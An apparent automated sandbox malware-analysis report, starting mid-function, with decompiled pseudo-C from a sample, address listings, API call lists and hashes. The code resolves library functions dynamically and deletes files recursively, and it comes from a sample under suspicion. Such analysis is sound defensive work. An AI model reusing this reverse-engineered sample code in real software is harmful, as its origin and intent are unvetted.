                                                              						__eflags = _v32 - _t283;
                                                              						if(_v32 == _t283) {
                                                              							goto L43;
                                                              						}
                                                              						goto L17;
                                                              					}
                                                              					_t277 = _t258 - 5;
                                                              					if(_t277 == 0) {
                                                              						__eflags = _v44 - _t283;
                                                              						if(_v44 != _t283) {
                                                              							goto L43;
                                                              						} else {
                                                              							__eflags = _v36 - 3;
                                                              							_v32 = 1;
                                                              							_v8 = _t283;
                                                              							_v20 = _t283;
                                                              							_v16 = (0 | _v36 == 0x00000003) + 1;
                                                              							_v40 = _t283;
                                                              							goto L20;
                                                              						}
                                                              					}
                                                              					_t281 = _t277 - 1;
                                                              					if(_t281 == 0) {
                                                              						__eflags = _v44 - _t283;
                                                              						if(_v44 != _t283) {
                                                              							goto L43;
                                                              						} else {
                                                              							_v32 = 2;
                                                              							_v8 = _t283;
                                                              							_v20 = _t283;
                                                              							goto L20;
                                                              						}
                                                              					}
                                                              					if(_t281 != 0x16) {
                                                              						goto L43;
                                                              					} else {
                                                              						_v32 = 3;
                                                              						_v8 = 1;
                                                              						goto L20;
                                                              					}
                                                              				}
                                                              				GlobalFree(_v56);
                                                              				GlobalFree(_v24);
                                                              				GlobalFree(_v48);
                                                              				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
                                                              					L182:
                                                              					return _t332;
                                                              				} else {
                                                              					_t225 =  *_t332 - 1;
                                                              					if(_t225 == 0) {
                                                              						_t187 = _t332 + 8; // 0x8
                                                              						_t324 = _t187;
                                                              						__eflags =  *_t324 - _t283;
                                                              						if( *_t324 != _t283) {
                                                              							_t226 = GetModuleHandleW(_t324);
                                                              							__eflags = _t226 - _t283;
                                                              							 *(_t332 + 0x1008) = _t226;
                                                              							if(_t226 != _t283) {
                                                              								L171:
                                                              								_t192 = _t332 + 0x808; // 0x808
                                                              								_t325 = _t192;
                                                              								_t227 = E6F6716BD( *(_t332 + 0x1008), _t325);
                                                              								__eflags = _t227 - _t283;
                                                              								 *(_t332 + 0x100c) = _t227;
                                                              								if(_t227 == _t283) {
                                                              									__eflags =  *_t325 - 0x23;
                                                              									if( *_t325 == 0x23) {
                                                              										_t195 = _t332 + 0x80a; // 0x80a
                                                              										_t231 = E6F6713B1(_t195);
                                                              										__eflags = _t231 - _t283;
                                                              										if(_t231 != _t283) {
                                                              											__eflags = _t231 & 0xffff0000;
                                                              											if((_t231 & 0xffff0000) == 0) {
                                                              												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
                                                              											}
                                                              										}
                                                              									}
                                                              								}
                                                              								__eflags = _v52 - _t283;
                                                              								if(_v52 != _t283) {
                                                              									L178:
                                                              									_t325[lstrlenW(_t325)] = 0x57;
                                                              									_t229 = E6F6716BD( *(_t332 + 0x1008), _t325);
                                                              									__eflags = _t229 - _t283;
                                                              									if(_t229 != _t283) {
                                                              										L166:
                                                              										 *(_t332 + 0x100c) = _t229;
                                                              										goto L182;
                                                              									}
                                                              									__eflags =  *(_t332 + 0x100c) - _t283;
                                                              									L180:
                                                              									if(__eflags != 0) {
                                                              										goto L182;
                                                              									}
                                                              									L181:
                                                              									_t206 = _t332 + 4;
                                                              									 *_t206 =  *(_t332 + 4) | 0xffffffff;
                                                              									__eflags =  *_t206;
                                                              									goto L182;
                                                              								} else {
                                                              									__eflags =  *(_t332 + 0x100c) - _t283;
                                                              									if( *(_t332 + 0x100c) != _t283) {
                                                              										goto L182;
                                                              									}
                                                              									goto L178;
                                                              								}
                                                              							}
                                                              							_t234 = LoadLibraryW(_t324);
                                                              							__eflags = _t234 - _t283;
                                                              							 *(_t332 + 0x1008) = _t234;
                                                              							if(_t234 == _t283) {
                                                              								goto L181;
                                                              							}
                                                              							goto L171;
                                                              						}
                                                              						_t188 = _t332 + 0x808; // 0x808
                                                              						_t236 = E6F6713B1(_t188);
                                                              						 *(_t332 + 0x100c) = _t236;
                                                              						__eflags = _t236 - _t283;
                                                              						goto L180;
                                                              					}
                                                              					_t237 = _t225 - 1;
                                                              					if(_t237 == 0) {
                                                              						_t185 = _t332 + 0x808; // 0x808
                                                              						_t238 = _t185;
                                                              						__eflags =  *_t238 - _t283;
                                                              						if( *_t238 == _t283) {
                                                              							goto L182;
                                                              						}
                                                              						_t229 = E6F6713B1(_t238);
                                                              						L165:
                                                              						goto L166;
                                                              					}
                                                              					if(_t237 != 1) {
                                                              						goto L182;
                                                              					}
                                                              					_t81 = _t332 + 8; // 0x8
                                                              					_t284 = _t81;
                                                              					_t326 = E6F6713B1(_t81);
                                                              					 *(_t332 + 0x1008) = _t326;
                                                              					if(_t326 == 0) {
                                                              						goto L181;
                                                              					}
                                                              					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
                                                              					 *((intOrPtr*)(_t332 + 0x1050)) = E6F6712CC(_t284);
                                                              					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
                                                              					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
                                                              					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
                                                              					_t90 = _t332 + 0x808; // 0x808
                                                              					_t229 =  *(_t326->i + E6F6713B1(_t90) * 4);
                                                              					goto L165;
                                                              				}
                                                              			}


































































                                                              0x6f671c07
                                                              0x6f671c0a
                                                              0x6f671c0d
                                                              0x6f671c10
                                                              0x6f671c13
                                                              0x6f671c16
                                                              0x6f671c19
                                                              0x6f671c1b
                                                              0x6f671c1e
                                                              0x6f671c21
                                                              0x6f671c26
                                                              0x6f671c29
                                                              0x6f671c31
                                                              0x6f671c39
                                                              0x6f671c3b
                                                              0x6f671c3e
                                                              0x6f671c46
                                                              0x6f671c46
                                                              0x6f671c4b
                                                              0x6f671c4e
                                                              0x00000000
                                                              0x00000000
                                                              0x6f671c5b
                                                              0x6f671c60
                                                              0x6f671c62
                                                              0x6f671cf4
                                                              0x6f671cf4
                                                              0x6f671cf4
                                                              0x6f671cf8
                                                              0x6f671cfb
                                                              0x6f671cfd
                                                              0x6f671d1f
                                                              0x6f671d21
                                                              0x6f671d24
                                                              0x6f671d2d
                                                              0x6f671d33
                                                              0x6f671d35
                                                              0x6f671d3b
                                                              0x6f671d3b
                                                              0x6f671d41
                                                              0x6f671d44
                                                              0x6f671d44
                                                              0x6f671d47
                                                              0x6f671d47
                                                              0x6f671d4d
                                                              0x6f671d4f
                                                              0x6f671d4f
                                                              0x6f671d51
                                                              0x6f671d54
                                                              0x6f671d57
                                                              0x6f671d5d
                                                              0x6f671d63
                                                              0x6f671d66
                                                              0x6f671d8a
                                                              0x6f671d8d
                                                              0x00000000
                                                              0x00000000
                                                              0x6f671d90
                                                              0x6f671d92
                                                              0x6f671da0
                                                              0x6f671da3
                                                              0x6f671da5
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x6f671da7
                                                              0x6f671da7
                                                              0x6f671da7
                                                              0x6f671dad
                                                              0x6f671daf
                                                              0x00000000
                                                              0x00000000
                                                              0x6f671db1
                                                              0x6f671db3
                                                              0x6f671db5
                                                              0x6f671db7
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x6f671db7
                                                              0x6f671db9
                                                              0x6f671dbb
                                                              0x6f671dbd
                                                              0x6f671dbd
                                                              0x6f671dc3
                                                              0x6f671dc9
                                                              0x6f671dcb
                                                              0x6f671ddf
                                                              0x6f671ddf
                                                              0x6f671de1
                                                              0x6f671dcd
                                                              0x6f671dd3
                                                              0x6f671dd6
                                                              0x6f671dd6
                                                              0x00000000
                                                              0x6f671d68
                                                              0x6f671d68
                                                              0x6f671d68
                                                              0x6f671d69
                                                              0x6f671d71
                                                              0x6f671d75
                                                              0x6f671d7b
                                                              0x6f671d7f
                                                              0x00000000
                                                              0x6f671d7f
                                                              0x6f671d6b
                                                              0x6f671d6b
                                                              0x6f671d6c
                                                              0x00000000
                                                              0x00000000
                                                              0x6f671d6e
                                                              0x6f671d6f
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x6f671d6f
                                                              0x6f671cff
                                                              0x6f671d00
                                                              0x6f671d09
                                                              0x6f671d0c
                                                              0x6f671d19
                                                              0x6f671d19
                                                              0x6f671d0e
                                                              0x6f671d0e
                                                              0x6f671de7
                                                              0x6f671dea
                                                              0x6f671dee
                                                              0x6f671e61
                                                              0x6f671e65
                                                              0x6f671c43
                                                              0x00000000
                                                              0x6f671c43
                                                              0x00000000
                                                              0x6f671e65
                                                              0x6f671cfd
                                                              0x6f671c68
                                                              0x6f671c6b
                                                              0x6f671cce
                                                              0x6f671cd1
                                                              0x6f671ce3
                                                              0x6f671ce3
                                                              0x6f671ce6
                                                              0x6f671df3
                                                              0x6f671df6
                                                              0x6f671df6
                                                              0x6f671df8
                                                              0x6f6721ae
                                                              0x6f6721c6
                                                              0x6f6721c6
                                                              0x6f6721c9
                                                              0x00000000
                                                              0x00000000
                                                              0x6f6721b3
                                                              0x6f6721b4
                                                              0x6f6721b7
                                                              0x6f6721ba
                                                              0x6f672244
                                                              0x6f67224b
                                                              0x6f672251
                                                              0x6f672255
                                                              0x6f671e5c
                                                              0x6f671e5d
                                                              0x6f671e5d
                                                              0x6f671e5e
                                                              0x00000000
                                                              0x6f671e5e
                                                              0x6f6721c0
                                                              0x6f6721c3
                                                              0x6f6721c3
                                                              0x6f6721cb
                                                              0x6f6721ce
                                                              0x6f672238
                                                              0x6f671e51
                                                              0x6f671e54
                                                              0x6f671e57
                                                              0x6f671e5a
                                                              0x6f671e5a
                                                              0x00000000
                                                              0x6f671e5a
                                                              0x6f6721d0
                                                              0x6f6721d3
                                                              0x6f6721da
                                                              0x6f6721da
                                                              0x6f6721dd
                                                              0x6f6721e1
                                                              0x6f6721f5
                                                              0x6f6721f5
                                                              0x6f6721f8
                                                              0x6f6721fc
                                                              0x00000000
                                                              0x00000000
                                                              0x6f6721fe
                                                              0x6f672202
                                                              0x00000000
                                                              0x00000000
                                                              0x6f672204
                                                              0x6f67220b
                                                              0x6f67220b
                                                              0x6f672211
                                                              0x6f672214
                                                              0x6f672230
                                                              0x6f672216
                                                              0x6f67221f
                                                              0x6f672222
                                                              0x6f672222
                                                              0x00000000
                                                              0x6f672214
                                                              0x6f6721e3
                                                              0x6f6721e6
                                                              0x6f6721ea
                                                              0x00000000
                                                              0x00000000
                                                              0x6f6721ec
                                                              0x00000000
                                                              0x6f6721ec
                                                              0x6f6721d5
                                                              0x6f6721d8
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x6f6721d8
                                                              0x6f671dfe
                                                              0x6f671dfe
                                                              0x6f671dff
                                                              0x6f671f49
                                                              0x6f671f49
                                                              0x6f671f50
                                                              0x6f671f53
                                                              0x00000000
                                                              0x00000000
                                                              0x6f671f60
                                                              0x00000000
                                                              0x6f67214b
                                                              0x6f67214e
                                                              0x6f672151
                                                              0x6f672151
                                                              0x6f672152
                                                              0x6f672153
                                                              0x6f672156
                                                              0x6f672159
                                                              0x6f67215c
                                                              0x00000000
                                                              0x00000000
                                                              0x6f67215e
                                                              0x6f67215e
                                                              0x6f672162
                                                              0x6f67217a
                                                              0x6f67217d
                                                              0x6f672181
                                                              0x6f672187
                                                              0x00000000
                                                              0x6f672187
                                                              0x6f672164
                                                              0x6f672164
                                                              0x6f672167
                                                              0x00000000
                                                              0x00000000
                                                              0x6f672169
                                                              0x6f67216c
                                                              0x6f67216e
                                                              0x6f67216f
                                                              0x6f67216f
                                                              0x6f67216f
                                                              0x6f672170
                                                              0x6f672173
                                                              0x6f672176
                                                              0x6f672177
                                                              0x6f672151
                                                              0x6f672152
                                                              0x6f672153
                                                              0x6f672156
                                                              0x6f672159
                                                              0x6f67215c
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x6f67215c
                                                              0x00000000
                                                              0x6f671fa7
                                                              0x00000000
                                                              0x00000000
                                                              0x6f671fb3
                                                              0x00000000
                                                              0x00000000
                                                              0x6f671f9a
                                                              0x6f671f9e
                                                              0x6f671fa2
                                                              0x00000000
                                                              0x00000000
                                                              0x6f67211c
                                                              0x6f672120
                                                              0x00000000
                                                              0x00000000
                                                              0x6f672126
                                                              0x6f67212f
                                                              0x6f672136
                                                              0x6f67213e
                                                              0x00000000
                                                              0x00000000
                                                              0x6f672083
                                                              0x6f672083
                                                              0x00000000
                                                              0x00000000
                                                              0x6f671fbc
                                                              0x00000000
                                                              0x00000000
                                                              0x6f6721a6
                                                              0x00000000
                                                              0x00000000
                                                              0x6f67208b
                                                              0x6f67208d
                                                              0x6f67208d
                                                              0x00000000
                                                              0x00000000
                                                              0x6f672196
                                                              0x00000000
                                                              0x00000000
                                                              0x6f67219a
                                                              0x00000000
                                                              0x00000000
                                                              0x6f6721a2
                                                              0x00000000
                                                              0x00000000
                                                              0x6f6720d3
                                                              0x6f6720d5
                                                              0x6f6720d5
                                                              0x00000000
                                                              0x00000000
                                                              0x6f67209d
                                                              0x6f67209f
                                                              0x6f67209f
                                                              0x00000000
                                                              0x00000000
                                                              0x6f6720af
                                                              0x6f6720b1
                                                              0x6f6720b1
                                                              0x00000000
                                                              0x00000000
                                                              0x6f6720e1
                                                              0x6f6720e3
                                                              0x6f6720e3
                                                              0x00000000
                                                              0x00000000
                                                              0x6f6720ba
                                                              0x6f6720bc
                                                              0x6f6720bc
                                                              0x00000000
                                                              0x00000000
                                                              0x6f6720c1
                                                              0x00000000
                                                              0x00000000
                                                              0x6f67219e
                                                              0x6f6721a8
                                                              0x6f6721a8
                                                              0x00000000
                                                              0x00000000
                                                              0x6f6720ec
                                                              0x6f6720f0
                                                              0x6f6720f5
                                                              0x6f6720f8
                                                              0x6f6720f9
                                                              0x6f6720fc
                                                              0x6f672102
                                                              0x6f672102
                                                              0x00000000
                                                              0x00000000
                                                              0x6f67218e
                                                              0x00000000
                                                              0x00000000
                                                              0x6f6720c5
                                                              0x6f6720c7
                                                              0x6f6720c7
                                                              0x00000000
                                                              0x00000000
                                                              0x6f671fc3
                                                              0x6f671fc3
                                                              0x00000000
                                                              0x00000000
                                                              0x6f6720da
                                                              0x6f6720dc
                                                              0x6f6720dc
                                                              0x00000000
                                                              0x00000000
                                                              0x6f671f67
                                                              0x6f671f6d
                                                              0x6f671f70
                                                              0x6f671f72
                                                              0x6f671f72
                                                              0x6f671f75
                                                              0x6f671f79
                                                              0x6f671f86
                                                              0x6f671f88
                                                              0x6f671f8e
                                                              0x6f671f8e
                                                              0x6f671f8e
                                                              0x00000000
                                                              0x00000000
                                                              0x6f67208e
                                                              0x6f67208e
                                                              0x6f672090
                                                              0x6f672097
                                                              0x00000000
                                                              0x00000000
                                                              0x6f6720d6
                                                              0x6f6720d6
                                                              0x00000000
                                                              0x00000000
                                                              0x6f6720a0
                                                              0x6f6720a0
                                                              0x6f6720a2
                                                              0x6f6720a9
                                                              0x00000000
                                                              0x00000000
                                                              0x6f6720b2
                                                              0x6f6720b2
                                                              0x6f6720b4
                                                              0x00000000
                                                              0x00000000
                                                              0x6f6720e4
                                                              0x6f6720e4
                                                              0x00000000
                                                              0x00000000
                                                              0x6f6720bd
                                                              0x6f6720bd
                                                              0x00000000
                                                              0x00000000
                                                              0x6f67210a
                                                              0x6f67210e
                                                              0x6f672113
                                                              0x6f672116
                                                              0x00000000
                                                              0x00000000
                                                              0x6f6720c8
                                                              0x6f6720c8
                                                              0x6f6720cb
                                                              0x6f6720cd
                                                              0x00000000
                                                              0x00000000
                                                              0x6f6720dd
                                                              0x6f6720dd
                                                              0x6f6720e6
                                                              0x6f6720e6
                                                              0x6f671fc5
                                                              0x6f671fc5
                                                              0x6f671fc8
                                                              0x6f671fcf
                                                              0x6f671fd1
                                                              0x6f671fd3
                                                              0x6f671fda
                                                              0x6f671fdd
                                                              0x6f671fe2
                                                              0x6f671fe4
                                                              0x6f671fe6
                                                              0x6f671fea
                                                              0x6f671ff0
                                                              0x6f671ff6
                                                              0x6f671ff6
                                                              0x6f671ff8
                                                              0x6f671ff8
                                                              0x6f671ff9
                                                              0x6f671ff9
                                                              0x6f671ffd
                                                              0x6f672003
                                                              0x6f672005
                                                              0x6f672009
                                                              0x6f67200e
                                                              0x6f67200e
                                                              0x6f672010
                                                              0x6f672010
                                                              0x6f672013
                                                              0x6f672016
                                                              0x6f67201f
                                                              0x6f672025
                                                              0x6f672028
                                                              0x6f672028
                                                              0x6f67202a
                                                              0x6f67202d
                                                              0x6f672033
                                                              0x6f672039
                                                              0x6f672039
                                                              0x6f67203b
                                                              0x00000000
                                                              0x00000000
                                                              0x6f672041
                                                              0x6f672041
                                                              0x6f672045
                                                              0x6f67204c
                                                              0x6f672070
                                                              0x6f672070
                                                              0x6f672074
                                                              0x6f672076
                                                              0x6f672079
                                                              0x6f672079
                                                              0x6f67207c
                                                              0x6f67207c
                                                              0x00000000
                                                              0x6f672074
                                                              0x6f672051
                                                              0x6f672054
                                                              0x6f672054
                                                              0x6f67205b
                                                              0x6f67205d
                                                              0x6f672060
                                                              0x6f672067
                                                              0x6f672068
                                                              0x6f67206e
                                                              0x6f67206e
                                                              0x00000000
                                                              0x6f67206e
                                                              0x6f672062
                                                              0x6f672065
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x6f672065
                                                              0x6f671ff2
                                                              0x6f671ff4
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x6f671f60
                                                              0x6f671e05
                                                              0x6f671e05
                                                              0x6f671e06
                                                              0x6f671f46
                                                              0x00000000
                                                              0x6f671f46
                                                              0x6f671e0c
                                                              0x6f671e0d
                                                              0x00000000
                                                              0x00000000
                                                              0x6f671e13
                                                              0x6f671e16
                                                              0x6f671f0b
                                                              0x6f671f0b
                                                              0x6f671f0e
                                                              0x6f671f23
                                                              0x6f671f25
                                                              0x6f671f25
                                                              0x6f671f26
                                                              0x6f671f29
                                                              0x6f671f2c
                                                              0x6f671f38
                                                              0x6f671f38
                                                              0x6f671f38
                                                              0x6f671f2e
                                                              0x6f671f2e
                                                              0x6f671f2e
                                                              0x6f671f3e
                                                              0x00000000
                                                              0x6f671f3e
                                                              0x6f671f10
                                                              0x6f671f10
                                                              0x6f671f11
                                                              0x6f671f1f
                                                              0x00000000
                                                              0x6f671f1f
                                                              0x6f671f14
                                                              0x6f671f15
                                                              0x00000000
                                                              0x00000000
                                                              0x6f671f1b
                                                              0x00000000
                                                              0x6f671f1b
                                                              0x6f671e1c
                                                              0x6f671f07
                                                              0x00000000
                                                              0x6f671f07
                                                              0x6f671e22
                                                              0x6f671e22
                                                              0x6f671e25
                                                              0x6f671e4e
                                                              0x00000000
                                                              0x6f671e4e
                                                              0x6f671e27
                                                              0x6f671e27
                                                              0x6f671e2a
                                                              0x6f671e44
                                                              0x00000000
                                                              0x6f671e44
                                                              0x6f671e2c
                                                              0x6f671e2c
                                                              0x6f671e2f
                                                              0x6f671e3e
                                                              0x00000000
                                                              0x6f671e3e
                                                              0x6f671e32
                                                              0x6f671e33
                                                              0x00000000
                                                              0x00000000
                                                              0x6f671e35
                                                              0x00000000
                                                              0x6f671cec
                                                              0x6f671cec
                                                              0x6f671cef
                                                              0x00000000
                                                              0x6f671cef
                                                              0x6f671ce6
                                                              0x6f671cd3
                                                              0x6f671cd8
                                                              0x00000000
                                                              0x00000000
                                                              0x6f671cda
                                                              0x6f671cdd
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x6f671cdd
                                                              0x6f671c6d
                                                              0x6f671c70
                                                              0x6f671ca6
                                                              0x6f671ca9
                                                              0x00000000
                                                              0x6f671caf
                                                              0x6f671cb1
                                                              0x6f671cb5
                                                              0x6f671cbc
                                                              0x6f671cc3
                                                              0x6f671cc6
                                                              0x6f671cc9
                                                              0x00000000
                                                              0x6f671cc9
                                                              0x6f671ca9
                                                              0x6f671c72
                                                              0x6f671c73
                                                              0x6f671c8e
                                                              0x6f671c91
                                                              0x00000000
                                                              0x6f671c97
                                                              0x6f671c97
                                                              0x6f671c9e
                                                              0x6f671ca1
                                                              0x00000000
                                                              0x6f671ca1
                                                              0x6f671c91
                                                              0x6f671c78
                                                              0x00000000
                                                              0x6f671c7e
                                                              0x6f671c7e
                                                              0x6f671c85
                                                              0x00000000
                                                              0x6f671c85
                                                              0x6f671c78
                                                              0x6f671e74
                                                              0x6f671e79
                                                              0x6f671e7e
                                                              0x6f671e82
                                                              0x6f672355
                                                              0x6f67235b
                                                              0x6f671e94
                                                              0x6f671e96
                                                              0x6f671e97
                                                              0x6f67227e
                                                              0x6f67227e
                                                              0x6f672281
                                                              0x6f672284
                                                              0x6f6722a1
                                                              0x6f6722a7
                                                              0x6f6722a9
                                                              0x6f6722af
                                                              0x6f6722c6
                                                              0x6f6722c6
                                                              0x6f6722c6
                                                              0x6f6722d3
                                                              0x6f6722d9
                                                              0x6f6722dc
                                                              0x6f6722e2
                                                              0x6f6722e4
                                                              0x6f6722e8
                                                              0x6f6722ea
                                                              0x6f6722f1
                                                              0x6f6722f6
                                                              0x6f6722f9
                                                              0x6f6722fb
                                                              0x6f672300
                                                              0x6f672312
                                                              0x6f672312
                                                              0x6f672300
                                                              0x6f6722f9
                                                              0x6f6722e8
                                                              0x6f672318
                                                              0x6f67231b
                                                              0x6f672325
                                                              0x6f67232d
                                                              0x6f67233a
                                                              0x6f672340
                                                              0x6f672343
                                                              0x6f672273
                                                              0x6f672273
                                                              0x00000000
                                                              0x6f672273
                                                              0x6f672349
                                                              0x6f67234f
                                                              0x6f67234f
                                                              0x00000000
                                                              0x00000000
                                                              0x6f672351
                                                              0x6f672351
                                                              0x6f672351
                                                              0x6f672351
                                                              0x00000000
                                                              0x6f67231d
                                                              0x6f67231d
                                                              0x6f672323
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x6f672323
                                                              0x6f67231b
                                                              0x6f6722b2
                                                              0x6f6722b8
                                                              0x6f6722ba
                                                              0x6f6722c0
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x6f6722c0
                                                              0x6f672286
                                                              0x6f67228d
                                                              0x6f672293
                                                              0x6f672299
                                                              0x00000000
                                                              0x6f672299
                                                              0x6f671e9d
                                                              0x6f671e9e
                                                              0x6f67225d
                                                              0x6f67225d
                                                              0x6f672263
                                                              0x6f672266
                                                              0x00000000
                                                              0x00000000
                                                              0x6f67226d
                                                              0x6f672272
                                                              0x00000000
                                                              0x6f672272
                                                              0x6f671ea5
                                                              0x00000000
                                                              0x00000000
                                                              0x6f671eab
                                                              0x6f671eab
                                                              0x6f671eb4
                                                              0x6f671eb9
                                                              0x6f671ebf
                                                              0x00000000
                                                              0x00000000
                                                              0x6f671ec5
                                                              0x6f671ed2
                                                              0x6f671ed8
                                                              0x6f671ee2
                                                              0x6f671ee8
                                                              0x6f671ef0
                                                              0x6f671f00
                                                              0x00000000
                                                              0x6f671f00

                                                              APIs
                                                                • Part of subcall function 6F6712BB: GlobalAlloc.KERNELBASE(00000040,?,6F6712DB,?,6F67137F,00000019,6F6711CA,-000000A0), ref: 6F6712C5
                                                              • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6F671D2D
                                                              • lstrcpyW.KERNEL32(00000008,?), ref: 6F671D75
                                                              • lstrcpyW.KERNEL32(00000808,?), ref: 6F671D7F
                                                              • GlobalFree.KERNEL32(00000000), ref: 6F671D92
                                                              • GlobalFree.KERNEL32(?), ref: 6F671E74
                                                              • GlobalFree.KERNEL32(?), ref: 6F671E79
                                                              • GlobalFree.KERNEL32(?), ref: 6F671E7E
                                                              • GlobalFree.KERNEL32(00000000), ref: 6F672068
                                                              • lstrcpyW.KERNEL32(?,?), ref: 6F672222
                                                              • GetModuleHandleW.KERNEL32(00000008), ref: 6F6722A1
                                                              • LoadLibraryW.KERNEL32(00000008), ref: 6F6722B2
                                                              • GetProcAddress.KERNEL32(?,?), ref: 6F67230C
                                                              • lstrlenW.KERNEL32(00000808), ref: 6F672326
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62505218441.000000006F671000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F670000, based on PE: true
                                                              • Associated: 00000001.00000002.62505168749.000000006F670000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.62505286401.000000006F674000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.62505338915.000000006F676000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6f670000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                              • String ID:
                                                              • API String ID: 245916457-0
                                                              • Opcode ID: 444509f377ad7da5f4e646ac73de56ad39c33ac19191a6def87632fb9070faa9
                                                              • Instruction ID: 7fb7d6040f4610be8fec133279c65298ef2c1c25ed2bf43a0d3c1aa45e7fec71
                                                              • Opcode Fuzzy Hash: 444509f377ad7da5f4e646ac73de56ad39c33ac19191a6def87632fb9070faa9
                                                              • Instruction Fuzzy Hash: 3E225971D4464ADADB308FB8C9946EEB7F4FF05315F10462BD165E6280DF74AA818F50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 669 405d74-405d9a call 40603f 672 405db3-405dba 669->672 673 405d9c-405dae DeleteFileW 669->673 675 405dbc-405dbe 672->675 676 405dcd-405ddd call 406668 672->676 674 405f30-405f34 673->674 677 405dc4-405dc7 675->677 678 405ede-405ee3 675->678 682 405dec-405ded call 405f83 676->682 683 405ddf-405dea lstrcatW 676->683 677->676 677->678 678->674 681 405ee5-405ee8 678->681 684 405ef2-405efa call 40699e 681->684 685 405eea-405ef0 681->685 686 405df2-405df6 682->686 683->686 684->674 693 405efc-405f10 call 405f37 call 405d2c 684->693 685->674 689 405e02-405e08 lstrcatW 686->689 690 405df8-405e00 686->690 692 405e0d-405e29 lstrlenW FindFirstFileW 689->692 690->689 690->692 695 405ed3-405ed7 692->695 696 405e2f-405e37 692->696 709 405f12-405f15 693->709 710 405f28-405f2b call 4056ca 693->710 695->678 698 405ed9 695->698 699 405e57-405e6b call 406668 696->699 700 405e39-405e41 696->700 698->678 711 405e82-405e8d call 405d2c 699->711 712 405e6d-405e75 699->712 701 405e43-405e4b 700->701 702 405eb6-405ec6 FindNextFileW 700->702 701->699 705 405e4d-405e55 701->705 702->696 708 405ecc-405ecd FindClose 702->708 705->699 705->702 708->695 709->685 713 405f17-405f26 call 4056ca call 406428 709->713 710->674 722 405eae-405eb1 call 4056ca 711->722 723 405e8f-405e92 711->723 712->702 714 405e77-405e80 call 405d74 712->714 713->674 714->702 722->702 726 405e94-405ea4 call 4056ca call 406428 723->726 727 405ea6-405eac 723->727 726->702 727->702
                                                              C-Code - Quality: 98%
                                                              			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
                                                              				signed int _v8;
                                                              				signed int _v12;
                                                              				short _v556;
                                                              				short _v558;
                                                              				struct _WIN32_FIND_DATAW _v604;
                                                              				signed int _t38;
                                                              				signed int _t52;
                                                              				signed int _t55;
                                                              				signed int _t62;
                                                              				void* _t64;
                                                              				signed char _t65;
                                                              				WCHAR* _t66;
                                                              				void* _t67;
                                                              				WCHAR* _t68;
                                                              				void* _t70;
                                                              
                                                              				_t65 = _a8;
                                                              				_t68 = _a4;
                                                              				_v8 = _t65 & 0x00000004;
                                                              				_t38 = E0040603F(__eflags, _t68);
                                                              				_v12 = _t38;
                                                              				if((_t65 & 0x00000008) != 0) {
                                                              					_t62 = DeleteFileW(_t68); // executed
                                                              					asm("sbb eax, eax");
                                                              					_t64 =  ~_t62 + 1;
                                                              					 *0x42a2e8 =  *0x42a2e8 + _t64;
                                                              					return _t64;
                                                              				}
                                                              				_a4 = _t65;
                                                              				_t8 =  &_a4;
                                                              				 *_t8 = _a4 & 0x00000001;
                                                              				__eflags =  *_t8;
                                                              				if( *_t8 == 0) {
                                                              					L5:
                                                              					E00406668(0x425750, _t68);
                                                              					__eflags = _a4;
                                                              					if(_a4 == 0) {
                                                              						E00405F83(_t68);
                                                              					} else {
                                                              						lstrcatW(0x425750, L"\\*.*");
                                                              					}
                                                              					__eflags =  *_t68;
                                                              					if( *_t68 != 0) {
                                                              						L10:
                                                              						lstrcatW(_t68, 0x40a014);
                                                              						L11:
                                                              						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                              						_t38 = FindFirstFileW(0x425750,  &_v604); // executed
                                                              						_t70 = _t38;
                                                              						__eflags = _t70 - 0xffffffff;
                                                              						if(_t70 == 0xffffffff) {
                                                              							L26:
                                                              							__eflags = _a4;
                                                              							if(_a4 != 0) {
                                                              								_t30 = _t66 - 2;
                                                              								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                              								__eflags =  *_t30;
                                                              							}
                                                              							goto L28;
                                                              						} else {
                                                              							goto L12;
                                                              						}
                                                              						do {
                                                              							L12:
                                                              							__eflags = _v604.cFileName - 0x2e;
                                                              							if(_v604.cFileName != 0x2e) {
                                                              								L16:
                                                              								E00406668(_t66,  &(_v604.cFileName));
                                                              								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                              								if(__eflags == 0) {
                                                              									_t52 = E00405D2C(__eflags, _t68, _v8);
                                                              									__eflags = _t52;
                                                              									if(_t52 != 0) {
                                                              										E004056CA(0xfffffff2, _t68);
                                                              									} else {
                                                              										__eflags = _v8 - _t52;
                                                              										if(_v8 == _t52) {
                                                              											 *0x42a2e8 =  *0x42a2e8 + 1;
                                                              										} else {
                                                              											E004056CA(0xfffffff1, _t68);
                                                              											E00406428(_t67, _t68, 0);
                                                              										}
                                                              									}
